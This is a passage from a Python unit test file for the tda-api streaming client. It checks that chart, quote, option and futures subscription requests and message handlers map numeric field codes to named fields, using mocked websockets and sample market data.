self.login_and_get_socket(ws_connect) stream_item = { 'data': [ { 'service': 'CHART_EQUITY', 'timestamp': 1590597641293, 'command': 'SUBS', 'content': [ { 'seq': 985, 'key': 'MSFT', '1': 179.445, '2': 179.57, '3': 179.4299, '4': 179.52, '5': 53742.0, '6': 339, '7': 1590597540000, '8': 18409 }, { 'seq': 654, 'key': 'GOOG', '1': 1408.8, '2': 1408.8, '3': 1408.1479, '4': 1408.1479, '5': 500.0, '6': 339, '7': 1590597540000, '8': 18409 } ] } ] } socket.recv.side_effect = [ json.dumps(self.success_response(1, 'CHART_EQUITY', 'SUBS')), json.dumps(stream_item)] await self.client.chart_equity_subs(['GOOG', 'MSFT']) handler = Mock() async_handler = asynctest.CoroutineMock() self.client.add_chart_equity_handler(handler) self.client.add_chart_equity_handler(async_handler) await self.client.handle_message() expected_item = { 'service': 'CHART_EQUITY', 'timestamp': 1590597641293, 'command': 'SUBS', 'content': [ { 'seq': 985, 'key': 'MSFT', 'OPEN_PRICE': 179.445, 'HIGH_PRICE': 179.57, 'LOW_PRICE': 179.4299, 'CLOSE_PRICE': 179.52, 'VOLUME': 53742.0, 'SEQUENCE': 339, 'CHART_TIME': 1590597540000, 'CHART_DAY': 18409 }, { 'seq': 654, 'key': 'GOOG', 'OPEN_PRICE': 1408.8, 'HIGH_PRICE': 1408.8, 'LOW_PRICE': 1408.1479, 'CLOSE_PRICE': 1408.1479, 'VOLUME': 500.0, 'SEQUENCE': 339, 'CHART_TIME': 1590597540000, 'CHART_DAY': 18409 } ] } self.assert_handler_called_once_with(handler, expected_item) self.assert_handler_called_once_with(async_handler, expected_item) ########################################################################## # CHART_FUTURES @no_duplicates @asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock) async def test_chart_futures_subs_and_add_success(self, ws_connect): socket = await self.login_and_get_socket(ws_connect) socket.recv.side_effect = [json.dumps(self.success_response( 1, 'CHART_FUTURES', 'SUBS'))] await self.client.chart_futures_subs(['/ES', '/CL']) socket.recv.assert_awaited_once() request = self.request_from_socket_mock(socket) self.assertEqual(request, { 'account': '1001', 'service': 'CHART_FUTURES', 'command': 'SUBS', 'requestid': '1', 'source': 'streamerInfo-appId', 'parameters': { 'keys': '/ES,/CL', 'fields': '0,1,2,3,4,5,6' } }) socket.reset_mock() socket.recv.side_effect = [json.dumps(self.success_response( 2, 'CHART_FUTURES', 'ADD'))] await self.client.chart_futures_add(['/ZC']) socket.recv.assert_awaited_once() request = self.request_from_socket_mock(socket) self.assertEqual(request, { 'account': '1001', 'service': 'CHART_FUTURES', 'command': 'ADD', 'requestid': '2', 'source': 'streamerInfo-appId', 'parameters': { 'keys': '/ZC', 'fields': '0,1,2,3,4,5,6' } }) @no_duplicates @asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock) async def test_chart_futures_subs_failure(self, ws_connect): socket = await self.login_and_get_socket(ws_connect) response = self.success_response(1, 'CHART_FUTURES', 'SUBS') response['response'][0]['content']['code'] = 21 socket.recv.side_effect = [json.dumps(response)] with self.assertRaises(tda.streaming.UnexpectedResponseCode): await self.client.chart_futures_subs(['/ES', '/CL']) @no_duplicates @asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock) async def test_chart_futures_add_failure(self, ws_connect): socket = await self.login_and_get_socket(ws_connect) response_subs = self.success_response(1, 'CHART_FUTURES', 'SUBS') response_add = self.success_response(2, 'CHART_FUTURES', 'ADD') response_add['response'][0]['content']['code'] = 21 socket.recv.side_effect = [ json.dumps(response_subs), json.dumps(response_add)] await self.client.chart_futures_subs(['/ES', '/CL']) with self.assertRaises(tda.streaming.UnexpectedResponseCode): await self.client.chart_futures_add(['/ZC']) @no_duplicates @asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock) async def test_chart_futures_handler(self, ws_connect): socket = await self.login_and_get_socket(ws_connect) stream_item = { 'data': [ { 'service': 'CHART_FUTURES', 'timestamp': 1590597913941, 'command': 'SUBS', 'content': [ { 'seq': 0, 'key': '/ES', '1': 1590597840000, '2': 2996.25, '3': 2997.25, '4': 2995.25, '5': 2997.25, '6': 1501.0 }, { 'seq': 0, 'key': '/CL', '1': 1590597840000, '2': 33.34, '3': 33.35, '4': 33.32, '5': 33.35, '6': 186.0 } ] } ] } socket.recv.side_effect = [ json.dumps(self.success_response(1, 'CHART_FUTURES', 'SUBS')), json.dumps(stream_item)] await self.client.chart_futures_subs(['/ES', '/CL']) handler = Mock() async_handler = asynctest.CoroutineMock() self.client.add_chart_futures_handler(handler) self.client.add_chart_futures_handler(async_handler) await self.client.handle_message() expected_item = { 'service': 'CHART_FUTURES', 'timestamp': 1590597913941, 'command': 'SUBS', 'content': [{ 'seq': 0, 'key': '/ES', 'CHART_TIME': 1590597840000, 'OPEN_PRICE': 2996.25, 'HIGH_PRICE': 2997.25, 'LOW_PRICE': 2995.25, 'CLOSE_PRICE': 2997.25, 'VOLUME': 1501.0 }, { 'seq': 0, 'key': '/CL', 'CHART_TIME': 1590597840000, 'OPEN_PRICE': 33.34, 'HIGH_PRICE': 33.35, 'LOW_PRICE': 33.32, 'CLOSE_PRICE': 33.35, 'VOLUME': 186.0 }] } self.assert_handler_called_once_with(handler, expected_item) self.assert_handler_called_once_with(async_handler, expected_item) ########################################################################## # QUOTE @no_duplicates @asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock) async def test_level_one_equity_subs_success_all_fields(self, ws_connect): socket = await self.login_and_get_socket(ws_connect) socket.recv.side_effect = [json.dumps(self.success_response( 1, 'QUOTE', 'SUBS'))] await self.client.level_one_equity_subs(['GOOG', 'MSFT']) socket.recv.assert_awaited_once() request = self.request_from_socket_mock(socket) self.assertEqual(request, { 'account': '1001', 'service': 'QUOTE', 'command': 'SUBS', 'requestid': '1', 'source': 'streamerInfo-appId', 'parameters': { 'keys': 'GOOG,MSFT', 'fields': ('0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,' + '20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,' + '36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,' + '52') } }) @no_duplicates @asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock) async def test_level_one_equity_subs_success_some_fields(self, ws_connect): socket = await self.login_and_get_socket(ws_connect) socket.recv.side_effect = [json.dumps(self.success_response( 1, 'QUOTE', 'SUBS'))] await self.client.level_one_equity_subs(['GOOG', 'MSFT'], fields=[ StreamClient.LevelOneEquityFields.SYMBOL, StreamClient.LevelOneEquityFields.BID_PRICE, StreamClient.LevelOneEquityFields.ASK_PRICE, StreamClient.LevelOneEquityFields.QUOTE_TIME, ]) socket.recv.assert_awaited_once() request = self.request_from_socket_mock(socket) self.assertEqual(request, { 'account': '1001', 'service': 'QUOTE', 'command': 'SUBS', 'requestid': '1', 'source': 'streamerInfo-appId', 'parameters': { 'keys': 'GOOG,MSFT', 'fields': '0,1,2,11' } }) @no_duplicates @asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock) async def test_level_one_equity_subs_success_some_fields_no_symbol( self, ws_connect): socket = await self.login_and_get_socket(ws_connect) socket.recv.side_effect = [json.dumps(self.success_response( 1, 'QUOTE', 'SUBS'))] await self.client.level_one_equity_subs(['GOOG', 'MSFT'], fields=[ StreamClient.LevelOneEquityFields.BID_PRICE, StreamClient.LevelOneEquityFields.ASK_PRICE, StreamClient.LevelOneEquityFields.QUOTE_TIME, ]) socket.recv.assert_awaited_once() request = self.request_from_socket_mock(socket) self.assertEqual(request, { 'account': '1001', 'service': 'QUOTE', 'command': 'SUBS', 'requestid': '1', 'source': 'streamerInfo-appId', 'parameters': { 'keys': 'GOOG,MSFT', 'fields': '0,1,2,11' } }) @no_duplicates @asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock) async def test_level_one_equity_subs_failure(self, ws_connect): socket = await self.login_and_get_socket(ws_connect) response = self.success_response(1, 'QUOTE', 'SUBS') response['response'][0]['content']['code'] = 21 socket.recv.side_effect = [json.dumps(response)] with self.assertRaises(tda.streaming.UnexpectedResponseCode): await self.client.level_one_equity_subs(['GOOG', 'MSFT']) @no_duplicates @asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock) async def test_level_one_quote_handler(self, ws_connect): socket = await self.login_and_get_socket(ws_connect) stream_item = { 'data': [{ 'service': 'QUOTE', 'command': 'SUBS', 'timestamp': 1590186642440, 'content': [{ 'key': 'GOOG', 'delayed': False, 'assetMainType': 'EQUITY', 'cusip': '02079K107', '1': 1404.92, '2': 1412.99, '3': 1411.89, '4': 1, '5': 2, '6': 'P', '7': 'K', '8': 1309408, '9': 2, '10': 71966, '11': 71970, '12': 1412.76, '13': 1391.83, '14': ' ', '15': 1410.42, '16': 'q', '17': True, '18': True, '19': 1412.991, '20': 1411.891, '21': 1309409, '22': 18404, '23': 18404, '24': 0.0389, '25': 'Alphabet Inc. - Class C Capital Stock', '26': 'P', '27': 4, '28': 1396.71, '29': 1.47, '30': 1532.106, '31': 1013.536, '32': 28.07, '33': 6.52, '34': 5.51, '35': 122.0, '36': 123.0, '37': 123123.0, '38': 123214.0, '39': 'NASD', '40': ' ', '41': True, '42': True, '43': 1410.42, '44': 699, '45': 57600, '46': 18404, '47': 1.48, '48': 'Normal', '49': 1410.42, '50': 1590191970734, '51': 1590191966446, '52': 1590177600617 }, { 'key': 'MSFT', 'delayed': False, 'assetMainType': 'EQUITY', 'cusip': '594918104', '1': 183.65, '2': 183.7, '3': 183.65, '4': 3, '5': 10, '6': 'P', '7': 'P', '8': 20826898, '9': 200, '10': 71988, '11': 71988, '12': 184.46, '13': 182.54, '14': ' ', '15': 183.51, '16': 'q', '17': True, '18': True, '19': 182.65, '20': 182.7, '21': 20826899, '22': 18404, '23': 18404, '24': 0.0126, '25': 'Microsoft Corporation - Common Stock', '26': 'K', '27': 4, '28': 183.19, '29': 0.14, '30': 190.7, '31': 119.01, '32': 32.3555, '33': 2.04, '34': 1.11, '35': 122.0, '36': 123.0, '37': 123123.0, '38': 123214.0, '39': 'NASD', '40': '2020-05-20 00:00:00.000', '41': True, '42': True, '43': 183.51, '44': 16890, '45': 57600, '46': 18404, '48': 'Normal', '47': 1.49, '49': 183.51, '50': 1590191988960, '51': 1590191988957, '52': 1590177600516 }] }] } socket.recv.side_effect = [ json.dumps(self.success_response(1, 'QUOTE', 'SUBS')), json.dumps(stream_item)] await self.client.level_one_equity_subs(['GOOG', 'MSFT']) handler = Mock() async_handler = asynctest.CoroutineMock() self.client.add_level_one_equity_handler(handler) self.client.add_level_one_equity_handler(async_handler) await self.client.handle_message() expected_item = { 'service': 'QUOTE', 'command': 'SUBS', 'timestamp': 1590186642440, 'content': [{ 'key': 'GOOG', 'delayed': False, 'assetMainType': 'EQUITY', 'cusip': '02079K107', 'BID_PRICE': 1404.92, 'ASK_PRICE': 1412.99, 'LAST_PRICE': 1411.89, 'BID_SIZE': 1, 'ASK_SIZE': 2, 'ASK_ID': 'P', 'BID_ID': 'K', 'TOTAL_VOLUME': 1309408, 'LAST_SIZE': 2, 'TRADE_TIME': 71966, 'QUOTE_TIME': 71970, 'HIGH_PRICE': 1412.76, 'LOW_PRICE': 1391.83, 'BID_TICK': ' ', 'CLOSE_PRICE': 1410.42, 'EXCHANGE_ID': 'q', 'MARGINABLE': True, 'SHORTABLE': True, 'ISLAND_BID_DEPRECATED': 1412.991, 'ISLAND_ASK_DEPRECATED': 1411.891, 'ISLAND_VOLUME_DEPRECATED': 1309409, 'QUOTE_DAY': 18404, 'TRADE_DAY': 18404, 'VOLATILITY': 0.0389, 'DESCRIPTION': 'Alphabet Inc. - Class C Capital Stock', 'LAST_ID': 'P', 'DIGITS': 4, 'OPEN_PRICE': 1396.71, 'NET_CHANGE': 1.47, 'HIGH_52_WEEK': 1532.106, 'LOW_52_WEEK': 1013.536, 'PE_RATIO': 28.07, 'DIVIDEND_AMOUNT': 6.52, 'DIVIDEND_YIELD': 5.51, 'ISLAND_BID_SIZE_DEPRECATED': 122.0, 'ISLAND_ASK_SIZE_DEPRECATED': 123.0, 'NAV': 123123.0, 'FUND_PRICE': 123214.0, 'EXCHANGE_NAME': 'NASD', 'DIVIDEND_DATE': ' ', 'IS_REGULAR_MARKET_QUOTE': True, 'IS_REGULAR_MARKET_TRADE': True, 'REGULAR_MARKET_LAST_PRICE': 1410.42, 'REGULAR_MARKET_LAST_SIZE': 699, 'REGULAR_MARKET_TRADE_TIME': 57600, 'REGULAR_MARKET_TRADE_DAY': 18404, 'REGULAR_MARKET_NET_CHANGE': 1.48, 'SECURITY_STATUS': 'Normal', 'MARK': 1410.42, 'QUOTE_TIME_IN_LONG': 1590191970734, 'TRADE_TIME_IN_LONG': 1590191966446, 'REGULAR_MARKET_TRADE_TIME_IN_LONG': 1590177600617 }, { 'key': 'MSFT', 'delayed': False, 'assetMainType': 'EQUITY', 'cusip': '594918104', 'BID_PRICE': 183.65, 'ASK_PRICE': 183.7, 'LAST_PRICE': 183.65, 'BID_SIZE': 3, 'ASK_SIZE': 10, 'ASK_ID': 'P', 'BID_ID': 'P', 'TOTAL_VOLUME': 20826898, 'LAST_SIZE': 200, 'TRADE_TIME': 71988, 'QUOTE_TIME': 71988, 'HIGH_PRICE': 184.46, 'LOW_PRICE': 182.54, 'BID_TICK': ' ', 'CLOSE_PRICE': 183.51, 'EXCHANGE_ID': 'q', 'MARGINABLE': True, 'SHORTABLE': True, 'ISLAND_BID_DEPRECATED': 182.65, 'ISLAND_ASK_DEPRECATED': 182.7, 'ISLAND_VOLUME_DEPRECATED': 20826899, 'QUOTE_DAY': 18404, 'TRADE_DAY': 18404, 'VOLATILITY': 0.0126, 'DESCRIPTION': 'Microsoft Corporation - Common Stock', 'LAST_ID': 'K', 'DIGITS': 4, 'OPEN_PRICE': 183.19, 'NET_CHANGE': 0.14, 'HIGH_52_WEEK': 190.7, 'LOW_52_WEEK': 119.01, 'PE_RATIO': 32.3555, 'DIVIDEND_AMOUNT': 2.04, 'DIVIDEND_YIELD': 1.11, 'ISLAND_BID_SIZE_DEPRECATED': 122.0, 'ISLAND_ASK_SIZE_DEPRECATED': 123.0, 'NAV': 123123.0, 'FUND_PRICE': 123214.0, 'EXCHANGE_NAME': 'NASD', 'DIVIDEND_DATE': '2020-05-20 00:00:00.000', 'IS_REGULAR_MARKET_QUOTE': True, 'IS_REGULAR_MARKET_TRADE': True, 'REGULAR_MARKET_LAST_PRICE': 183.51, 'REGULAR_MARKET_LAST_SIZE': 16890, 'REGULAR_MARKET_TRADE_TIME': 57600, 'REGULAR_MARKET_TRADE_DAY': 18404, 'SECURITY_STATUS': 'Normal', 'REGULAR_MARKET_NET_CHANGE': 1.49, 'MARK': 183.51, 'QUOTE_TIME_IN_LONG': 1590191988960, 'TRADE_TIME_IN_LONG': 1590191988957, 'REGULAR_MARKET_TRADE_TIME_IN_LONG': 1590177600516 }] } self.assert_handler_called_once_with(handler, expected_item) self.assert_handler_called_once_with(async_handler, expected_item) ########################################################################## # OPTION @no_duplicates @asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock) async def test_level_one_option_subs_success_all_fields(self, ws_connect): socket = await self.login_and_get_socket(ws_connect) socket.recv.side_effect = [json.dumps(self.success_response( 1, 'OPTION', 'SUBS'))] await self.client.level_one_option_subs( ['GOOG_052920C620', 'MSFT_052920C145']) socket.recv.assert_awaited_once() request = self.request_from_socket_mock(socket) self.assertEqual(request, { 'account': '1001', 'service': 'OPTION', 'command': 'SUBS', 'requestid': '1', 'source': 'streamerInfo-appId', 'parameters': { 'keys': 'GOOG_052920C620,MSFT_052920C145', 'fields': ('0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,' + '20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,' + '36,37,38,39,40,41') } }) @no_duplicates @asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock) async def test_level_one_option_subs_success_some_fields(self, ws_connect): socket = await self.login_and_get_socket(ws_connect) socket.recv.side_effect = [json.dumps(self.success_response( 1, 'OPTION', 'SUBS'))] await self.client.level_one_option_subs( ['GOOG_052920C620', 'MSFT_052920C145'], fields=[ StreamClient.LevelOneOptionFields.SYMBOL, StreamClient.LevelOneOptionFields.BID_PRICE, StreamClient.LevelOneOptionFields.ASK_PRICE, StreamClient.LevelOneOptionFields.VOLATILITY, ]) socket.recv.assert_awaited_once() request = self.request_from_socket_mock(socket) self.assertEqual(request, { 'account': '1001', 'service': 'OPTION', 'command': 'SUBS', 'requestid': '1', 'source': 'streamerInfo-appId', 'parameters': { 'keys': 'GOOG_052920C620,MSFT_052920C145', 'fields': '0,2,3,10' } }) @no_duplicates @asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock) async def test_level_one_option_subs_success_some_fields_no_symbol( self, ws_connect): socket = await self.login_and_get_socket(ws_connect) socket.recv.side_effect = [json.dumps(self.success_response( 1, 'OPTION', 'SUBS'))] await self.client.level_one_option_subs( ['GOOG_052920C620', 'MSFT_052920C145'], fields=[ StreamClient.LevelOneOptionFields.BID_PRICE, StreamClient.LevelOneOptionFields.ASK_PRICE, StreamClient.LevelOneOptionFields.VOLATILITY, ]) socket.recv.assert_awaited_once() request = self.request_from_socket_mock(socket) self.assertEqual(request, { 'account': '1001', 'service': 'OPTION', 'command': 'SUBS', 'requestid': '1', 'source': 'streamerInfo-appId', 'parameters': { 'keys': 'GOOG_052920C620,MSFT_052920C145', 'fields': '0,2,3,10' } }) @no_duplicates @asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock) async def test_level_one_option_subs_failure(self, ws_connect): socket = await self.login_and_get_socket(ws_connect) response = self.success_response(1, 'OPTION', 'SUBS') response['response'][0]['content']['code'] = 21 socket.recv.side_effect = [json.dumps(response)] with self.assertRaises(tda.streaming.UnexpectedResponseCode): await self.client.level_one_option_subs( ['GOOG_052920C620', 'MSFT_052920C145']) @no_duplicates @asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock) async def test_level_one_option_handler(self, ws_connect): socket = await self.login_and_get_socket(ws_connect) stream_item = { 'data': [{ 'service': 'OPTION', 'timestamp': 1590244265891, 'command': 'SUBS', 'content': [{ 'key': 'MSFT_052920C145', 'delayed': False, 'assetMainType': 'OPTION', 'cusip': '0MSFT.ET00145000', '1': 'MSFT May 29 2020 145 Call (Weekly)', '2': 38.05, '3': 39.05, '4': 38.85, '5': 38.85, '6': 38.85, '7': 38.581, '8': 2, '9': 7, '10': 5, '11': 57599, '12': 53017, '13': 38.51, '14': 18404, '15': 18404, '16': 2020, '17': 100, '18': 2, '19': 38.85, '20': 6, '21': 116, '22': 1, '23': 0.3185, '24': 145, '25': 'C', '26': 'MSFT', '27': 5, '29': 0.34, '30': 29, '31': 6, '32': 1, '33': 0, '34': 0, '35': 0.1882, '37': 'Normal', '38': 38.675, '39': 183.51, '40': 'S', '41': 38.55 }, { 'key': 'GOOG_052920C620', 'delayed': False, 'assetMainType': 'OPTION', 'cusip': '0GOOG.ET00620000', '1': 'GOOG May 29 2020 620 Call (Weekly)', '2': 785.2, '3': 794, '7': 790.42, '10': 238.2373, '11': 57594, '12': 68400, '13': 790.42, '14': 18404, '16': 2020, '17': 100, '18': 2, '20': 1, '21': 6, '24': 620, '25': 'C', '26': 'GOOG', '27': 5, '29': -0.82, '30': 29, '31': 6, '32': 0.996, '33': 0, '34': -0.3931, '35': 0.023, '36': 0.1176, '37': 'Normal', '38': 789.6, '39': 1410.42, '40': 'S', '41': 789.6 }] } ] } socket.recv.side_effect = [ json.dumps(self.success_response(1, 'OPTION', 'SUBS')), json.dumps(stream_item)] await self.client.level_one_option_subs( ['GOOG_052920C620', 'MSFT_052920C145']) handler = Mock() async_handler = asynctest.CoroutineMock() self.client.add_level_one_option_handler(handler) self.client.add_level_one_option_handler(async_handler) await self.client.handle_message() expected_item = { 'service': 'OPTION', 'timestamp': 1590244265891, 'command': 'SUBS', 'content': [{ 'key': 'MSFT_052920C145', 'delayed': False, 'assetMainType': 'OPTION', 'cusip': '0MSFT.ET00145000', 'DESCRIPTION': 'MSFT May 29 2020 145 Call (Weekly)', 'BID_PRICE': 38.05, 'ASK_PRICE': 39.05, 'LAST_PRICE': 38.85, 'HIGH_PRICE': 38.85, 'LOW_PRICE': 38.85, 'CLOSE_PRICE': 38.581, 'TOTAL_VOLUME': 2, 'OPEN_INTEREST': 7, 'VOLATILITY': 5, 'QUOTE_TIME': 57599, 'TRADE_TIME': 53017, 'MONEY_INTRINSIC_VALUE': 38.51, 'QUOTE_DAY': 18404, 'TRADE_DAY': 18404, 'EXPIRATION_YEAR': 2020, 'MULTIPLIER': 100, 'DIGITS': 2, 'OPEN_PRICE': 38.85, 'BID_SIZE': 6, 'ASK_SIZE': 116, 'LAST_SIZE': 1, 'NET_CHANGE': 0.3185, 'STRIKE_PRICE': 145, 'CONTRACT_TYPE': 'C', 'UNDERLYING': 'MSFT', 'EXPIRATION_MONTH': 5, 'TIME_VALUE': 0.34, 'EXPIRATION_DAY': 29, 'DAYS_TO_EXPIRATION': 6, 'DELTA': 1, 'GAMMA': 0, 'THETA': 0, 'VEGA': 0.1882, 'SECURITY_STATUS': 'Normal', 'THEORETICAL_OPTION_VALUE': 38.675, 'UNDERLYING_PRICE': 183.51, 'UV_EXPIRATION_TYPE': 'S', 'MARK': 38.55 }, { 'key': 'GOOG_052920C620', 'delayed': False, 'assetMainType': 'OPTION', 'cusip': '0GOOG.ET00620000', 'DESCRIPTION': 'GOOG May 29 2020 620 Call (Weekly)', 'BID_PRICE': 785.2, 'ASK_PRICE': 794, 'CLOSE_PRICE': 790.42, 'VOLATILITY': 238.2373, 'QUOTE_TIME': 57594, 'TRADE_TIME': 68400, 'MONEY_INTRINSIC_VALUE': 790.42, 'QUOTE_DAY': 18404, 'EXPIRATION_YEAR': 2020, 'MULTIPLIER': 100, 'DIGITS': 2, 'BID_SIZE': 1, 'ASK_SIZE': 6, 'STRIKE_PRICE': 620, 'CONTRACT_TYPE': 'C', 'UNDERLYING': 'GOOG', 'EXPIRATION_MONTH': 5, 'TIME_VALUE': -0.82, 'EXPIRATION_DAY': 29, 'DAYS_TO_EXPIRATION': 6, 'DELTA': 0.996, 'GAMMA': 0, 'THETA': -0.3931, 'VEGA': 0.023, 'RHO': 0.1176, 'SECURITY_STATUS': 'Normal', 'THEORETICAL_OPTION_VALUE': 789.6, 'UNDERLYING_PRICE': 1410.42, 'UV_EXPIRATION_TYPE': 'S', 'MARK': 789.6 }] } self.assert_handler_called_once_with(handler, expected_item) self.assert_handler_called_once_with(async_handler, expected_item) ########################################################################## # LEVELONE_FUTURES @no_duplicates @asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock) async def test_level_one_futures_subs_success_all_fields(self, ws_connect): socket = await self.login_and_get_socket(ws_connect) socket.recv.side_effect = [json.dumps(self.success_response( 1, 'LEVELONE_FUTURES', 'SUBS'))] await self.client.level_one_futures_subs(['/ES', '/CL']) socket.recv.assert_awaited_once() request = self.request_from_socket_mock(socket) self.assertEqual(request, { 'account': '1001', 'service': 'LEVELONE_FUTURES', 'command': 'SUBS', 'requestid': '1', 'source': 'streamerInfo-appId', 'parameters': { 'keys': '/ES,/CL', 'fields': ('0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,' + '20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35') } }) @no_duplicates @asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock) async def test_level_one_futures_subs_success_some_fields(self, ws_connect): socket = await self.login_and_get_socket(ws_connect) socket.recv.side_effect = [json.dumps(self.success_response( 1, 'LEVELONE_FUTURES', 'SUBS'))] await self.client.level_one_futures_subs(['/ES', '/CL'], fields=[ StreamClient.LevelOneFuturesFields.SYMBOL, StreamClient.LevelOneFuturesFields.BID_PRICE, StreamClient.LevelOneFuturesFields.ASK_PRICE, StreamClient.LevelOneFuturesFields.FUTURE_PRICE_FORMAT, ]) socket.recv.assert_awaited_once() request = self.request_from_socket_mock(socket) self.assertEqual(request, { 'account': '1001', 'service': 'LEVELONE_FUTURES', 'command': 'SUBS', 'requestid': '1', 'source': 'streamerInfo-appId', 'parameters': { 'keys': '/ES,/CL', 'fields': '0,1,2,28' } }) @no_duplicates @asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock) async def test_level_one_futures_subs_success_some_fields_no_symbol( self, ws_connect): socket = await self.login_and_get_socket(ws_connect) socket.recv.side_effect = [json.dumps(self.success_response( 1, 'LEVELONE_FUTURES', 'SUBS'))] await self.client.level_one_futures_subs(['/ES', '/CL'], fields=[ StreamClient.LevelOneFuturesFields.BID_PRICE, StreamClient.LevelOneFuturesFields.ASK_PRICE, StreamClient.LevelOneFuturesFields.FUTURE_PRICE_FORMAT, ]) socket.recv.assert_awaited_once() request = self.request_from_socket_mock(socket) self.assertEqual(request, { 'account': '1001', 'service': 'LEVELONE_FUTURES', 'command': 'SUBS', 'requestid': '1', 'source': 'streamerInfo-appId', 'parameters': { 'keys': '/ES,/CL', 'fields': '0,1,2,28' } }) @no_duplicates @asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock) async def test_level_one_futures_subs_failure(self, ws_connect): socket = await self.login_and_get_socket(ws_connect) response = self.success_response(1, 'LEVELONE_FUTURES', 'SUBS') response['response'][0]['content']['code'] = 21 socket.recv.side_effect = [json.dumps(response)] with self.assertRaises(tda.streaming.UnexpectedResponseCode): await self.client.level_one_futures_subs(['/ES', '/CL']) @no_duplicates @asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock) async def test_level_one_futures_handler(self, ws_connect): socket = await self.login_and_get_socket(ws_connect) stream_item = { 'data': [{ 'service': 'LEVELONE_FUTURES', 'timestamp': 1590598762176, 'command': 'SUBS', 'content': [{ 'key': '/ES', 'delayed': False, '1': 2998.75, '2': 2999, '3': 2998.75, '4': 15, '5': 47, '6': '?', '7': '?', '8': 1489587, '9': 6, '10': 1590598761934, '11': 1590598761921, '12': 3035, '13': 2965.5, '14': 2994.5, '15': 'E', '16': 'E-mini S&P 500 Index Futures,Jun-2020,ETH', '17': '?', '18': 2994, '19': 4.25, '20': 0.0014, '21': 'XCME', '22': 'Unknown', '23': 3121588, '24': 2999.25, '25': 0.25, '26': 12.5, '27': '/ES', '28': 'D,D', '29': ('GLBX(de=1640;0=-1700151515301600;' + '1=r-17001515r15301600d-15551640;' + '7=d-16401555)'), '30': True, '31': 50, '32': True, '33': 2994.5, '34': '/ESM20', '35': 1592539200000 }, { 'key': '/CL', 'delayed': False, '1': 33.33, '2': 33.34, '3': 33.34, '4': 13, '5': 3, '6': '?', '7': '?', '8': 325014, '9': 2, '10': 1590598761786, '11': 1590598761603, '12': 34.32, '13': 32.18, '14': 34.35, '15': 'E', '16': 'Light Sweet Crude Oil Futures,Jul-2020,ETH', '17': '?', '18': 34.14, '19': -1.01, '20': -0.0294, '21': 'XNYM', '22': 'Unknown', '23': 270931, '24': 33.35, '25': 0.01, '26': 10, '27': '/CL', '28': 'D,D', '29': ('GLBX(de=1640;0=-17001600;' + '1=-17001600d-15551640;7=d-16401555)'), '30': True, '31': 1000, '32': True, '33': 34.35, '34': '/CLN20', '35': 1592798400000 }] }] } socket.recv.side_effect = [ json.dumps(self.success_response(1, 'LEVELONE_FUTURES', 'SUBS')), json.dumps(stream_item)] await self.client.level_one_futures_subs(['/ES', '/CL']) handler = Mock() async_handler = asynctest.CoroutineMock() self.client.add_level_one_futures_handler(handler) self.client.add_level_one_futures_handler(async_handler) await self.client.handle_message() expected_item = { 'service': 'LEVELONE_FUTURES', 'timestamp': 1590598762176, 'command': 'SUBS', 'content': [{ 'key': '/ES', 'delayed': False, 'BID_PRICE': 2998.75, 'ASK_PRICE': 2999, 'LAST_PRICE': 2998.75, 'BID_SIZE': 15, 'ASK_SIZE': 47, 'ASK_ID': '?', 'BID_ID': '?', 'TOTAL_VOLUME': 1489587, 'LAST_SIZE': 6, 'QUOTE_TIME': 1590598761934, 'TRADE_TIME': 1590598761921, 'HIGH_PRICE': 3035, 'LOW_PRICE': 2965.5, 'CLOSE_PRICE': 2994.5, 'EXCHANGE_ID': 'E', 'DESCRIPTION': 'E-mini S&P 500 Index Futures,Jun-2020,ETH', 'LAST_ID': '?', 'OPEN_PRICE': 2994, 'NET_CHANGE': 4.25, 'FUTURE_PERCENT_CHANGE': 0.0014, 'EXCHANGE_NAME': 'XCME', 'SECURITY_STATUS': 'Unknown', 'OPEN_INTEREST': 3121588, 'MARK': 2999.25, 'TICK': 0.25, 'TICK_AMOUNT': 12.5, 'PRODUCT': '/ES', 'FUTURE_PRICE_FORMAT': 'D,D', 'FUTURE_TRADING_HOURS': ( 'GLBX(de=1640;0=-1700151515301600;' + '1=r-17001515r15301600d-15551640;' + '7=d-16401555)'), 'FUTURE_IS_TRADEABLE': True, 'FUTURE_MULTIPLIER': 50, 'FUTURE_IS_ACTIVE': True, 'FUTURE_SETTLEMENT_PRICE': 2994.5, 'FUTURE_ACTIVE_SYMBOL': '/ESM20', 'FUTURE_EXPIRATION_DATE': 1592539200000 }, { 'key': '/CL', 'delayed': False, 'BID_PRICE': 33.33, 'ASK_PRICE': 33.34, 'LAST_PRICE': 33.34, 'BID_SIZE': 13, 'ASK_SIZE': 3, 'ASK_ID': '?', 'BID_ID': '?', 'TOTAL_VOLUME': 325014, 'LAST_SIZE': 2, 'QUOTE_TIME': 1590598761786, 'TRADE_TIME': 